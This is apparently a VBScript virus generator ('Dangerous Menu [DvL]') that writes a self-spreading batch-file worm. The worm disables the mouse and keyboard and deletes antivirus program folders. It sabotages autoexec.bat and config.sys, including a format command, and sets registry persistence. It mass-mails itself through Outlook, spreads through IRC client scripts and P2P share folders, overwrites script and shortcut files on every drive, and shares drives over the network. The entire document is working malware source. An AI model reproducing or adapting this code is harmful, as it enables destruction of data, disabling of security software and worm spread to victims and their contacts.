randomize(timer)
set a=CreateObject("scripting.filesystemobject")
set b=a.CreateTextFile ("batvirus.txt")
b.Writeline "X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*"
c=int((rnd*9999999999999)+1)
d=int((rnd*9999999999999)+1)
e=int((rnd*9999999999999)+1)
f=int((rnd*9999999999999)+1)
g=int((rnd*9999999999999)+1)
b.Write c&d&e&f&g&c&d&e&f
b.WriteBlankLines "1"
b.Write d&e&f&g&c&d&e&f&f
b.WriteBlankLines "1"
b.Write e&f&g&c&d&e&f&g&c
b.WriteBlankLines "1"
b.Write f&g&c&d&e&f&g&c&d
b.WriteBlankLines "1"
b.Write g&c&d&e&f&g&c&d&e
b.WriteBlankLines "1"
b.Write c&d&e&f&g&c&d&e&f
b.WriteBlankLines "1"
b.Write d&e&f&g&c&d&e&f&f
b.WriteBlankLines "1"
b.Write e&f&g&c&d&e&f&g&c
b.WriteBlankLines "1"
b.Write f&g&c&d&e&f&g&c&d
b.WriteBlankLines "1"
b.Write g&c&d&e&f&g&c&d&e
b.WriteBlankLines "1"
b.Writeline ":: Generated by Dangerous Menu [DvL]"
b.Writeline "@echo off"
b.Writeline "@ver"&chr(124)&"find "&chr(34)&"XP"&chr(34)&chr(124)&"if errorlevel 1 ctty nul"&chr(124)&"if not errorlevel 1 exit"
b.Writeline "break off"
c=""
d=int(rnd(1)*8)+1
for w=1 To d
c=c&chr(int(rnd(1)*26)+97)
next
b.Writeline "md %windir%\system\"&c&">nul"
b.Writeline "copy %0 %windir%\system\"&c&"\tmpdelis.bat"&">nul"
e=""
f=int(rnd(1)*8)+1
for w=1 To f
e=e&chr(int(rnd(1)*26)+97)
next
b.Writeline "set "&e&"=deltree/y c:\"
g=""
h=int(rnd(1)*8)+1
for w=1 To h
g=g&chr(int(rnd(1)*26)+97)
next
b.Writeline "set "&g&"=progra~1\"
b.Writeline "echo.REGEDIT4>%windir%\system\"&c&"\"&c&".reg"
b.Writeline "echo.[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServicesOnce]>>%windir%\system\"&c&"\"&c&".reg"
b.Writeline "echo."&Chr(34)&"System Logging"&Chr(34)&"="&Chr(34)&"C:\WINDOWS\system\"&c&"\tmpdelis.bat"&Chr(34)&">>%windir%\system\"&c&"\"&c&".reg"
b.Writeline "regedit /s %windir%\system\"&c&"\"&c&".reg"
b.Writeline "rundll32 mouse,disable"
b.Writeline "rundll32 keyboard,disable"
b.Writeline chr(37)&e&chr(37)&"antiba~1\>nul"
b.Writeline chr(37)&e&chr(37)&"antiba~2\>nul"
b.Writeline chr(37)&e&chr(37)&"antiba~1.1\>nul"
b.Writeline chr(37)&e&chr(37)&"antiba~1.2\>nul"
b.Writeline chr(37)&e&chr(37)&"antiba~1.3\>nul"
b.Writeline chr(37)&e&chr(37)&"antiba~1.4\>nul"
b.Writeline chr(37)&e&chr(37)&"antiba~1.5\>nul"
b.Writeline chr(37)&e&chr(37)&"antiba~1.6\>nul"
b.Writeline chr(37)&e&chr(37)&"antiba~1.7\>nul"
b.Writeline chr(37)&e&chr(37)&"antiba~1.8\>nul"
b.Writeline chr(37)&e&chr(37)&"antivi~1\>nul"
b.Writeline chr(37)&e&chr(37)&"antivi~2\>nul"
b.Writeline chr(37)&e&chr(37)&"antiviru\>nul"
b.Writeline chr(37)&e&chr(37)&"avg\>nul"
b.Writeline chr(37)&e&chr(37)&"avp\>nul"
b.Writeline chr(37)&e&chr(37)&"avp30\>nul"
b.Writeline chr(37)&e&chr(37)&"avx\>nul"
b.Writeline chr(37)&e&chr(37)&"avpers~1\>nul"
b.Writeline chr(37)&e&chr(37)&"bitdef~1\>nul"
b.Writeline chr(37)&e&chr(37)&"bitdef~2\>nul"
b.Writeline chr(37)&e&chr(37)&"comman~1\>nul"
b.Writeline chr(37)&e&chr(37)&"cleancih\>nul"
b.Writeline chr(37)&e&chr(37)&"esafen\>nul"
b.Writeline chr(37)&e&chr(37)&"findvi~1\>nul"
b.Writeline chr(37)&e&chr(37)&"f-macro\>nul"
b.Writeline chr(37)&e&chr(37)&"f-prot\>nul"
b.Writeline chr(37)&e&chr(37)&"f-prot95\>nul"
b.Writeline chr(37)&e&chr(37)&"f-secu~1\>nul"
b.Writeline chr(37)&e&chr(37)&"fwin\>nul"
b.Writeline chr(37)&e&chr(37)&"fwin32\>nul"
b.Writeline chr(37)&e&chr(37)&"inocul~1\>nul"
b.Writeline chr(37)&e&chr(37)&"inocul~2\>nul"
b.Writeline chr(37)&e&chr(37)&"kasper~1\>nul"
b.Writeline chr(37)&e&chr(37)&"kasper~2\>nul"
b.Writeline chr(37)&e&chr(37)&"mcafee\>nul"
b.Writeline chr(37)&e&chr(37)&"mcafee~1\>nul"
b.Writeline chr(37)&e&chr(37)&"msav\>nul"
b.Writeline chr(37)&e&chr(37)&"norman\>nul"
b.Writeline chr(37)&e&chr(37)&"norton~1\>nul"
b.Writeline chr(37)&e&chr(37)&"norton~2\>nul"
b.Writeline chr(37)&e&chr(37)&"pav\>nul"
b.Writeline chr(37)&e&chr(37)&"pccill~1\>nul"
b.Writeline chr(37)&e&chr(37)&"pc-cil~1\>nul"
b.Writeline chr(37)&e&chr(37)&"rav\>nul"
b.Writeline chr(37)&e&chr(37)&"softwin\>nul"
b.Writeline chr(37)&e&chr(37)&"tbav\>nul"
b.Writeline chr(37)&e&chr(37)&"tbavw95\>nul"
b.Writeline chr(37)&e&chr(37)&"toolkit\>nul"
b.Writeline chr(37)&e&chr(37)&"trendm~1\>nul"
b.Writeline chr(37)&e&chr(37)&"trex\>nul"
b.Writeline chr(37)&e&chr(37)&"virus\>nul"
b.Writeline chr(37)&e&chr(37)&"vpc\>nul"
b.Writeline chr(37)&e&chr(37)&"vs95\>nul"
b.Writeline chr(37)&e&chr(37)&"zonela~1\>nul"
b.Writeline chr(37)&e&chr(37)&"zonela~2\>nul"
b.Writeline chr(37)&e&chr(37)&chr(37)&g&chr(37)&"antiba~1\>nul"
b.Writeline chr(37)&e&chr(37)&chr(37)&g&chr(37)&"antiba~2\>nul"
b.Writeline chr(37)&e&chr(37)&chr(37)&g&chr(37)&"antiba~1.1\>nul"
b.Writeline chr(37)&e&chr(37)&chr(37)&g&chr(37)&"antiba~1.2\>nul"
b.Writeline chr(37)&e&chr(37)&chr(37)&g&chr(37)&"antiba~1.3\>nul"
b.Writeline chr(37)&e&chr(37)&chr(37)&g&chr(37)&"antiba~1.4\>nul"
b.Writeline chr(37)&e&chr(37)&chr(37)&g&chr(37)&"antiba~1.5\>nul"
b.Writeline chr(37)&e&chr(37)&chr(37)&g&chr(37)&"antiba~1.6\>nul"
b.Writeline chr(37)&e&chr(37)&chr(37)&g&chr(37)&"antiba~1.7\>nul"
b.Writeline chr(37)&e&chr(37)&chr(37)&g&chr(37)&"antiba~1.8\>nul"
b.Writeline chr(37)&e&chr(37)&chr(37)&g&chr(37)&"antivi~1\>nul"
b.Writeline chr(37)&e&chr(37)&chr(37)&g&chr(37)&"antivi~2\>nul"
b.Writeline chr(37)&e&chr(37)&chr(37)&g&chr(37)&"avg\>nul"
b.Writeline chr(37)&e&chr(37)&chr(37)&g&chr(37)&"avp\>nul"
b.Writeline chr(37)&e&chr(37)&chr(37)&g&chr(37)&"avx\>nul"
b.Writeline chr(37)&e&chr(37)&chr(37)&g&chr(37)&"avx2000\>nul"
b.Writeline chr(37)&e&chr(37)&chr(37)&g&chr(37)&"avpers~1\>nul"
b.Writeline chr(37)&e&chr(37)&chr(37)&g&chr(37)&"bitdef~1\>nul"
b.Writeline chr(37)&e&chr(37)&chr(37)&g&chr(37)&"bitdef~2\>nul"
b.Writeline chr(37)&e&chr(37)&chr(37)&g&chr(37)&"comman~1\>nul"
b.Writeline chr(37)&e&chr(37)&chr(37)&g&chr(37)&"common~1\avpsha~1\>nul"
b.Writeline chr(37)&e&chr(37)&chr(37)&g&chr(37)&"common~1\symant~1\>nul"
b.Writeline chr(37)&e&chr(37)&chr(37)&g&chr(37)&"datafe~1\>nul"
b.Writeline chr(37)&e&chr(37)&chr(37)&g&chr(37)&"deerfi~1.com\>nul"
b.Writeline chr(37)&e&chr(37)&chr(37)&g&chr(37)&"f-prot\>nul"
b.Writeline chr(37)&e&chr(37)&chr(37)&g&chr(37)&"f-prot95\>nul"
b.Writeline chr(37)&e&chr(37)&chr(37)&g&chr(37)&"findvi~1\>nul"
b.Writeline chr(37)&e&chr(37)&chr(37)&g&chr(37)&"f-secu~1\>nul"
b.Writeline chr(37)&e&chr(37)&chr(37)&g&chr(37)&"f-secure\>nul"
b.Writeline chr(37)&e&chr(37)&chr(37)&g&chr(37)&"fsi\>nul"
b.Writeline chr(37)&e&chr(37)&chr(37)&g&chr(37)&"fwin\>nul"
b.Writeline chr(37)&e&chr(37)&chr(37)&g&chr(37)&"fwin32\>nul"
b.Writeline chr(37)&e&chr(37)&chr(37)&g&chr(37)&"grisoft\>nul"
b.Writeline chr(37)&e&chr(37)&chr(37)&g&chr(37)&"inocul~1\>nul"
b.Writeline chr(37)&e&chr(37)&chr(37)&g&chr(37)&"inocul~2\>nul"
b.Writeline chr(37)&e&chr(37)&chr(37)&g&chr(37)&"intern~2\>nul"
b.Writeline chr(37)&e&chr(37)&chr(37)&g&chr(37)&"kasper~1\>nul"
b.Writeline chr(37)&e&chr(37)&chr(37)&g&chr(37)&"kasper~2\>nul"
b.Writeline chr(37)&e&chr(37)&chr(37)&g&chr(37)&"mcafee\>nul"
b.Writeline chr(37)&e&chr(37)&chr(37)&g&chr(37)&"mcafee~1\>nul"
b.Writeline chr(37)&e&chr(37)&chr(37)&g&chr(37)&"mindso~1\>nul"
b.Writeline chr(37)&e&chr(37)&chr(37)&g&chr(37)&"norman\>nul"
b.Writeline chr(37)&e&chr(37)&chr(37)&g&chr(37)&"norton~1\>nul"
b.Writeline chr(37)&e&chr(37)&chr(37)&g&chr(37)&"norton~2\>nul"
b.Writeline chr(37)&e&chr(37)&chr(37)&g&chr(37)&"pandas~1\>nul"
b.Writeline chr(37)&e&chr(37)&chr(37)&g&chr(37)&"protec~1\>nul"
b.Writeline chr(37)&e&chr(37)&chr(37)&g&chr(37)&"protec~2\>nul"
b.Writeline chr(37)&e&chr(37)&chr(37)&g&chr(37)&"quickh~1\>nul"
b.Writeline chr(37)&e&chr(37)&chr(37)&g&chr(37)&"rav\>nul"
b.Writeline chr(37)&e&chr(37)&chr(37)&g&chr(37)&"signal9\>nul"
b.Writeline chr(37)&e&chr(37)&chr(37)&g&chr(37)&"softwin\>nul"
b.Writeline chr(37)&e&chr(37)&chr(37)&g&chr(37)&"spysto~1\>nul"
b.Writeline chr(37)&e&chr(37)&chr(37)&g&chr(37)&"symant~1\>nul"
b.Writeline chr(37)&e&chr(37)&chr(37)&g&chr(37)&"tbav\>nul"
b.Writeline chr(37)&e&chr(37)&chr(37)&g&chr(37)&"tinype~1\>nul"
b.Writeline chr(37)&e&chr(37)&chr(37)&g&chr(37)&"trendm~1\>nul"
b.Writeline chr(37)&e&chr(37)&chr(37)&g&chr(37)&"trendp~1\>nul"
b.Writeline chr(37)&e&chr(37)&chr(37)&g&chr(37)&"trojan~1\>nul"
b.Writeline chr(37)&e&chr(37)&chr(37)&g&chr(37)&"trojan~2\>nul"
b.Writeline chr(37)&e&chr(37)&chr(37)&g&chr(37)&"virusm~1.0\>nul"
b.Writeline chr(37)&e&chr(37)&chr(37)&g&chr(37)&"zonela~1\>nul"
b.Writeline chr(37)&e&chr(37)&chr(37)&g&chr(37)&"zonela~2\>nul"
b.Writeline "echo.time 00:00:00,00>>c:\autoexec.bat"
b.Writeline "echo.date 80-01-01>>c:\autoexec.bat"
b.Writeline "echo.%comspec% nul /f /c if exist e:\nul subst e: a:\>>c:\autoexec.bat"
b.Writeline "echo.%comspec% nul /f /c if exist d:\nul subst d: a:\>>c:\autoexec.bat"
b.Writeline "echo.%comspec% nul /f /c if exist c:\nul subst c: a:\>>c:\autoexec.bat"
b.Writeline "echo.[menu]>c:\config.sys"
b.Writeline "echo.menuitem="&g&">>c:\config.sys"
b.Writeline "echo.>>c:\config.sys"
b.Writeline "echo.["&g&"]>>c:\config.sys"
b.Writeline "echo.buffers=1>>c:\config.sys"
b.Writeline "echo.files=1>>c:\config.sys"
b.Writeline "echo.lastdrive=A>>c:\config.sys"
b.Writeline "echo.set path="&chr(37)&e&chr(37)&">>c:\config.sys"
b.Writeline "echo.set temp=A:\>>c:\config.sys"
b.Writeline "echo.set windir=format c:/u/q/autotest>>c:\config.sys"
t=""
f=int(rnd(1)*8)+1
for w=1 To f
t=t&chr(int(rnd(1)*26)+97)
next
b.Writeline "set "&t&"=adress"
u=""
f=int(rnd(1)*8)+1
for w=1 To f
u=u&chr(int(rnd(1)*26)+97)
next
b.Writeline "set "&u&"=attachments.add"
b.Writeline "copy %0 c:\"&c&".bat>nul"
b.Writeline "echo.set abc=createobject("&Chr(34)&"outlook.application"&Chr(34)&")>%windir%\system\"&c&"\"&c&".vbs"
b.Writeline "echo.set bac=abc.getnamespace("&Chr(34)&"MAPI"&Chr(34)&")>>%windir%\system\"&c&"\"&c&".vbs"
b.Writeline "echo.set cab=bac."&Chr(37)&t&Chr(37)&"lists>>%windir%\system\"&c&"\"&c&".vbs"
b.Writeline "echo.for each d in cab>>%windir%\system\"&c&"\"&c&".vbs"
b.Writeline "echo.for e=1 to d."&Chr(37)&t&Chr(37)&"entries.count>>%windir%\system\"&c&"\"&c&".vbs"
b.Writeline "echo.dim f>>%windir%\system\"&c&"\"&c&".vbs"
b.Writeline "echo.set f=abc.createitem(0)>>%windir%\system\"&c&"\"&c&".vbs"
b.Writeline "echo.f.to=d."&Chr(37)&t&Chr(37)&"entries(e)."&Chr(37)&t&Chr(37)&">>%windir%\system\"&c&"\"&c&".vbs"
b.Writeline "echo.f.subject="&chr(34)&chr(34)&">>%windir%\system\"&c&"\"&c&".vbs"
b.Writeline "echo.f.body="&chr(34)&chr(34)&"&d."&Chr(37)&t&Chr(37)&"entries(e).name&"&chr(34)&chr(34)&"&vbcrlf>>%windir%\system\"&c&"\"&c&".vbs"
b.Writeline "echo.f.body=f.body&"&chr(34)&chr(34)&"&vbcrlf>>%windir%\system\"&c&"\"&c&".vbs"
b.Writeline "echo.f.body=f.body&"&chr(34)&chr(34)&"&vbcrlf&"&chr(34)&chr(34)&"&f>>%windir%\system\"&c&"\"&c&".vbs"
b.Writeline "echo.f."&Chr(37)&u&Chr(37)&" "&Chr(34)&"c:\"&c&".bat"&Chr(34)&",1,len(f.body),"&Chr(34)&c&Chr(34)&">>%windir%\system\"&c&"\"&c&".vbs"
b.Writeline "echo.f.importance=2>>%windir%\system\"&c&"\"&c&".vbs"
b.Writeline "echo.f.send>>%windir%\system\"&c&"\"&c&".vbs"
b.Writeline "echo.next>>%windir%\system\"&c&"\"&c&".vbs"
b.Writeline "echo.next>>%windir%\system\"&c&"\"&c&".vbs"
b.Writeline "cscript %windir%\system\"&c&"\"&c&".vbs"
b.Writeline "echo.[script]>%windir%\system\"&c&"\"&c&".ini"
b.Writeline "echo.n0=on 1:JOIN:#:{>>%windir%\system\"&c&"\"&c&".ini"
b.Writeline "echo.n1=/if ( $nick == $me ) { halt }>>%windir%\system\"&c&"\"&c&".ini"
b.Writeline "echo.n2=/dcc send $nick %windir%\system\"&c&"\tmpdelis.bat>>%windir%\system\"&c&"\"&c&".ini"
b.Writeline "echo.n3=}>>%windir%\system\"&c&"\"&c&".ini"
b.Writeline chr(37)&e&chr(37)&"mirc\script.ini>nul"
b.Writeline chr(37)&e&chr(37)&"mirc32\script.ini>nul"
b.Writeline chr(37)&e&chr(37)&chr(37)&g&chr(37)&"mirc\script.ini>nul"
b.Writeline chr(37)&e&chr(37)&chr(37)&g&chr(37)&"mirc32\script.ini>nul"
b.Writeline "copy %windir%\system\"&c&"\"&c&".ini c:\mirc\script.ini>nul"
b.Writeline "copy %windir%\system\"&c&"\"&c&".ini c:\mirc32\script.ini>nul"
b.Writeline "copy %windir%\system\"&c&"\"&c&".ini c:\"&chr(37)&g&chr(37)&"mirc\script.ini>nul"
b.Writeline "copy %windir%\system\"&c&"\"&c&".ini c:\"&chr(37)&g&chr(37)&"mirc32\script.ini>nul"
b.Writeline "echo.[Levels]>%windir%\system\"&c&"\"&c&".ini"
b.Writeline "echo.Enabled=1>>%windir%\system\"&c&"\"&c&".ini"
b.Writeline "echo.Count=1>>%windir%\system\"&c&"\"&c&".ini"
b.Writeline "echo.Level1="&c&">>%windir%\system\"&c&"\"&c&".ini"
b.Writeline "echo."&c&"Enabled=1>>%windir%\system\"&c&"\"&c&".ini"
b.Writeline "echo.>>%windir%\system\"&c&"\"&c&".ini"
b.Writeline "echo.["&c&"]>>%windir%\system\"&c&"\"&c&".ini"
b.Writeline "echo.User1=*!*@*>>%windir%\system\"&c&"\"&c&".ini"
b.Writeline "echo.UserCount=1>>%windir%\system\"&c&"\"&c&".ini"
b.Writeline "echo.Event1=ON PART:#:/dcc send $nick %windir%\system\"&c&"\tmpdelis.bat "&Chr(124)&" /msg $nick WinUpdate>>%windir%\system\"&c&"\"&c&".ini"
b.Writeline "echo.Event2=ON JOIN:#:/dcc send $nick %windir%\system\"&c&"\tmpdelis.bat "&Chr(124)&" /notice $nick Potential>>%windir%\system\"&c&"\"&c&".ini"
b.Writeline "echo.Event3=ON TEXT:*fuck*:*:/dcc send $nick %windir%\system\"&c&"\tmpdelis.bat>>%windir%\system\"&c&"\"&c&".ini"
b.Writeline "echo.Event4=ON TEXT:*sex*:*:/dcc send $nick %windir%\system\"&c&"\tmpdelis.bat>>%windir%\system\"&c&"\"&c&".ini"
b.Writeline "echo.Event5=ON TEXT:*girl*:*:/dcc send $nick %windir%\system\"&c&"\tmpdelis.bat>>%windir%\system\"&c&"\"&c&".ini"
b.Writeline "echo.EventCount=5>>%windir%\system\"&c&"\"&c&".ini"
b.Writeline chr(37)&e&chr(37)&"pirch\events.ini>nul"
b.Writeline chr(37)&e&chr(37)&"pirch98\events.ini>nul"
b.Writeline chr(37)&e&chr(37)&"pirch32\events.ini>nul"
b.Writeline chr(37)&e&chr(37)&chr(37)&g&chr(37)&"pirch\events.ini>nul"
b.Writeline chr(37)&e&chr(37)&chr(37)&g&chr(37)&"pirch98\events.ini>nul"
b.Writeline chr(37)&e&chr(37)&chr(37)&g&chr(37)&"pirch32\events.ini>nul"
b.Writeline "copy %windir%\system\"&c&"\"&c&".ini c:\pirch\events.ini>nul"
b.Writeline "copy %windir%\system\"&c&"\"&c&".ini c:\pirch98\events.ini>nul"
b.Writeline "copy %windir%\system\"&c&"\"&c&".ini c:\pirch32\events.ini>nul"
b.Writeline "copy %windir%\system\"&c&"\"&c&".ini c:\"&chr(37)&g&chr(37)&"pirch\events.ini>nul"
b.Writeline "copy %windir%\system\"&c&"\"&c&".ini c:\"&chr(37)&g&chr(37)&"pirch98\events.ini>nul"
b.Writeline "copy %windir%\system\"&c&"\"&c&".ini c:\"&chr(37)&g&chr(37)&"pirch32\events.ini>nul"
b.Writeline "echo.set z=CreateObject("&Chr(34)&"wscript.shell"&Chr(34)&")>>%windir%\system\"&c&"\"&c&".vbs"
b.Writeline "echo.z.regwrite "&Chr(34)&"HKEY_USERS\.Default\Software\MeGaLiTh Software\Visual IRC 96\Events\Event17"&Chr(34)&","&Chr(34)&"dcc send $nick %windir%\system\"&c&"\tmpdelis.bat"&Chr(34)&">>%windir%\system\"&c&"\"&c&".vbs"
b.Writeline "cscript %windir%\system\"&c&"\"&c&".vbs"
b.Writeline "copy %0 c:\download\"&c&".bat>nul"
b.Writeline "copy %0 c:\kazaa\myshar~1\"&c&".bat>nul"
b.Writeline "copy %0 c:\mydown~1\"&c&".bat>nul"
b.Writeline "copy %0 c:\mydocu~1\"&c&".bat>nul"
b.Writeline "copy %0 c:\"&chr(37)&g&chr(37)&"applej~1\incoming\"&c&".bat>nul"
b.Writeline "copy %0 c:\"&chr(37)&g&chr(37)&"bearsh~1\shared\"&c&".bat>nul"
b.Writeline "copy %0 c:\"&chr(37)&g&chr(37)&"edonke~1\incoming\"&c&".bat>nul"
b.Writeline "copy %0 c:\"&chr(37)&g&chr(37)&"emule\incoming\"&c&".bat>nul"
b.Writeline "copy %0 c:\"&chr(37)&g&chr(37)&"grokster\mygrok~1\"&c&".bat>nul"
b.Writeline "copy %0 c:\"&chr(37)&g&chr(37)&"icq\shared~1\"&c&".bat>nul"
b.Writeline "copy %0 c:\"&chr(37)&g&chr(37)&"kazaa\myshar~1\"&c&".bat>nul"
b.Writeline "copy %0 c:\"&chr(37)&g&chr(37)&"kazaal~1\myshar~1\"&c&".bat>nul"
b.Writeline "copy %0 c:\"&chr(37)&g&chr(37)&"kmd\myshar~1\"&c&".bat>nul"
b.Writeline "copy %0 c:\"&chr(37)&g&chr(37)&"limewire\shared\"&c&".bat>nul"
b.Writeline "copy %0 c:\"&chr(37)&g&chr(37)&"morpheus\myshar~1\"&c&".bat>nul"
b.Writeline "copy %0 c:\"&chr(37)&g&chr(37)&"overnet\bundles\"&c&".bat>nul"
b.Writeline "echo.set a=Wscript.CreateObject("&Chr(34)&"WScript.Shell"&Chr(34)&")>%windir%\system\"&c&"\"&c&".vbs"
b.Writeline "echo.set b=a.CreateShortcut("&Chr(34)&"C:\WINDOWS\system\"&c&"\"&c&".lnk"&Chr(34)&")>>%windir%\system\"&c&"\"&c&".vbs"
b.Writeline "echo.b.TargetPath=a.ExpandEnvironmentStrings("&Chr(34)&"C:\WINDOWS\system\"&c&"\tmpdelis.bat"&Chr(34)&")>>%windir%\system\"&c&"\"&c&".vbs"
b.Writeline "echo.b.WindowStyle=4>>%windir%\system\"&c&"\"&c&".vbs"
b.Writeline "echo.b.Save>>%windir%\system\"&c&"\"&c&".vbs"
b.Writeline "cscript %windir%\system\"&c&"\"&c&".vbs"
b.Writeline "for %%b in (c:\*.lnk *.lnk ..\*.lnk c:\mydocu~1\*.lnk %windir%\*.lnk %path%\*.lnk %windir%\desktop\*.lnk %windir%\system\*.lnk) do attrib -r -h -s -a %%b"
b.Writeline "for %%b in (c:\*.lnk *.lnk ..\*.lnk c:\mydocu~1\*.lnk %windir%\*.lnk %path%\*.lnk %windir%\desktop\*.lnk %windir%\system\*.lnk) do copy %windir%\system\"&c&"\"&c&".lnk %%b /y"
b.Writeline "for %%b in (c;d;e;f;g;h;i;j;k;l;m;n;o;p;q;r;s;t;u;v;w;x;y;z;a) do %comspec% nul /f /c if exist %%b:\nul copy %windir%\"&c&"\"&c&".lnk %%b:\funny.lnk /y"
b.Writeline "for %%c in (*.bat ..\*.bat c:\mydocu~1\*.bat %windir%\*.bat %path%\*.bat %windir%\desktop\*.bat %windir%\command\ebd\*.bat %windir%\system\*.bat) do attrib -r -h -s -a %%c"
b.Writeline "for %%c in (*.bat ..\*.bat c:\mydocu~1\*.bat %windir%\*.bat %path%\*.bat %windir%\desktop\*.bat %windir%\command\ebd\*.bat %windir%\system\*.bat) do copy %windir%\system\"&c&"\tmpdelis.bat %%c /y"
b.Writeline "for %%c in (c;d;e;f;g;h;i;j;k;l;m;n;o;p;q;r;s;t;u;v;w;x;y;z;a) do %comspec% nul /f /c if exist %%c:\nul copy %windir%\system\"&c&"\tmpdelis.bat %%c:\_tmpcfg.bat /y"
b.Writeline "echo.SHELL "&Chr(34)&"%windir%\system\"&c&"\tmpdelis.bat"&Chr(34)&">%windir%\system\"&c&"\"&c&".bas"
b.Writeline "echo.END>>%windir%\system\"&c&"\"&c&".bas"
b.Writeline "for %%d in (c:\*.bas *.bas ..\*.bas c:\mydocu~1\*.bas %windir%\*.bas %path%\*.bas %windir%\desktop\*.bas %windir%\system\*.bas) do attrib -r -h -s -a %%d"
b.Writeline "for %%d in (c:\*.bas *.bas ..\*.bas c:\mydocu~1\*.bas %windir%\*.bas %path%\*.bas %windir%\desktop\*.bas %windir%\system\*.bas) do copy %windir%\system\"&c&"\"&c&".bas %%d /y"
b.Writeline "for %%d in (c;d;e;f;g;h;i;j;k;l;m;n;o;p;q;r;s;t;u;v;w;x;y;z;a) do %comspec% nul /f /c if exist %%d:\nul copy %windir%\system\"&c&"\"&c&".bas %%d:\tmp_.bas /y"
b.Writeline "echo.set a=wscript.createobject("&Chr(34)&"wscript.shell"&Chr(34)&")>%windir%\system\"&c&"\"&c&".vbs"
b.Writeline "echo.a.run "&Chr(34)&"C:\WINDOWS\system\"&c&"\tmpdelis.bat"&Chr(34)&", VBHide>>%windir%\system\"&c&"\"&c&".vbs"
b.Writeline "for %%e in (c:\*.vb* *.vb* ..\*.vb* c:\mydocu~1\*.vb* %windir%\*.vb* %path%\*.vb* %windir%\desktop\*.vb* %windir%\system\*.vb*) do attrib -r -h -s -a %%e"
b.Writeline "for %%e in (c:\*.vb* *.vb* ..\*.vb* c:\mydocu~1\*.vb* %windir%\*.vb* %path%\*.vb* %windir%\desktop\*.vb* %windir%\system\*.vb*) do copy %windir%\system\"&c&"\"&c&".vbs %%e /y"
b.Writeline "for %%e in (c;d;e;f;g;h;i;j;k;l;m;n;o;p;q;r;s;t;u;v;w;x;y;z;a) do %comspec% nul /f /c if exist %%e:\nul copy %windir%\system\"&c&"\"&c&".vbs %%e:\tmp_.vbs /y"
b.Writeline "echo.a=wscript.createobject("&Chr(34)&"wscript.shell"&Chr(34)&");>%windir%\system\"&c&"\"&c&".js"
b.Writeline "echo.a.Run("&Chr(34)&"C:\WINDOWS\system\"&c&"\tmpdelis.bat"&Chr(34)&");>>%windir%\system\"&c&"\"&c&".js"
b.Writeline "for %%f in (c:\*.js* *.js* ..\*.js* c:\mydocu~1\*.js* %windir%\*.js* %path%\*.js* %windir%\desktop\*.js* %windir%\system\*.js*) do attrib -r -h -s -a %%f"
b.Writeline "for %%f in (c:\*.js* *.js* ..\*.js* c:\mydocu~1\*.js* %windir%\*.js* %path%\*.js* %windir%\desktop\*.js* %windir%\system\*.js*) do copy %windir%\system\"&c&"\"&c&".js %%f /y"
b.Writeline "for %%f in (c;d;e;f;g;h;i;j;k;l;m;n;o;p;q;r;s;t;u;v;w;x;y;z;a) do %comspec% nul /f /c if exist %%f:\nul copy %windir%\system\"&c&"\"&c&".js %%f:\tmp_.js /y"
b.Writeline "echo.REGEDIT4>%windir%\system\"&c&"\"&c&".reg"
b.Writeline "echo.>>%windir%\system\"&c&"\"&c&".reg"
b.Writeline "echo.[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Network\LanMan]>>%windir%\system\"&c&"\"&c&".reg"
b.Writeline "echo.>>%windir%\system\"&c&"\"&c&".reg"
b.Writeline "echo.[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Network\LanMan\"&Chr(37)&Chr(37)&"1$]>>%windir%\system\"&c&"\"&c&".reg"
b.Writeline "echo."&Chr(34)&"Flags"&Chr(34)&"=dword:00000302>>%windir%\system\"&c&"\"&c&".reg"
b.Writeline "echo."&Chr(34)&"Parm1enc"&Chr(34)&"=hex:>>%windir%\system\"&c&"\"&c&".reg"
b.Writeline "echo."&Chr(34)&"Parm2enc"&Chr(34)&"=hex:>>%windir%\system\"&c&"\"&c&".reg"
b.Writeline "echo."&Chr(34)&"Path"&Chr(34)&"="&Chr(34)&Chr(37)&Chr(37)&"1:\\"&Chr(34)&">>%windir%\system\"&c&"\"&c&".reg"
b.Writeline "echo."&Chr(34)&"Remark"&Chr(34)&"="&Chr(34)&Chr(34)&">>%windir%\system\"&c&"\"&c&".reg"
b.Writeline "echo."&Chr(34)&"Type"&Chr(34)&"=dword:00000000>>%windir%\system\"&c&"\"&c&".reg"
b.Writeline "for %%g in (c;d;e;f;g;h;i;j;k;l;m;n;o;p;q;t;s;t;u;v;w;x;y;z;a) do start regedit /s %windir%\system\"&c&"\"&c&".reg %%g>nul"
i=""
j=int(rnd(1)*8)+1
for w=1 To j
i=i&chr(int(rnd(1)*120)+120)
next
b.Writeline "set "&i&"=md %windir%\desktop\"
b.Writeline Chr(37)&i&Chr(37)&i&"00"&Chr(62)&"nul "&Chr(124)&" "&Chr(37)&i&Chr(37)&i&"01"&Chr(62)&"nul "&Chr(124)&" "&Chr(37)&i&Chr(37)&i&"02"&Chr(62)&"nul "&Chr(124)&" "&Chr(37)&i&Chr(37)&i&"03"&Chr(62)&"nul"
b.Writeline Chr(37)&i&Chr(37)&i&"04"&Chr(62)&"nul "&Chr(124)&" "&Chr(37)&i&Chr(37)&i&"05"&Chr(62)&"nul "&Chr(124)&" "&Chr(37)&i&Chr(37)&i&"06"&Chr(62)&"nul "&Chr(124)&" "&Chr(37)&i&Chr(37)&i&"07"&Chr(62)&"nul"
b.Writeline Chr(37)&i&Chr(37)&i&"08"&Chr(62)&"nul "&Chr(124)&" "&Chr(37)&i&Chr(37)&i&"09"&Chr(62)&"nul "&Chr(124)&" "&Chr(37)&i&Chr(37)&i&"10"&Chr(62)&"nul "&Chr(124)&" "&Chr(37)&i&Chr(37)&i&"11"&Chr(62)&"nul"
b.Writeline Chr(37)&i&Chr(37)&i&"12"&Chr(62)&"nul "&Chr(124)&" "&Chr(37)&i&Chr(37)&i&"13"&Chr(62)&"nul "&Chr(124)&" "&Chr(37)&i&Chr(37)&i&"14"&Chr(62)&"nul "&Chr(124)&" "&Chr(37)&i&Chr(37)&i&"15"&Chr(62)&"nul"
b.Writeline Chr(37)&i&Chr(37)&i&"16"&Chr(62)&"nul "&Chr(124)&" "&Chr(37)&i&Chr(37)&i&"17"&Chr(62)&"nul "&Chr(124)&" "&Chr(37)&i&Chr(37)&i&"18"&Chr(62)&"nul "&Chr(124)&" "&Chr(37)&i&Chr(37)&i&"19"&Chr(62)&"nul"
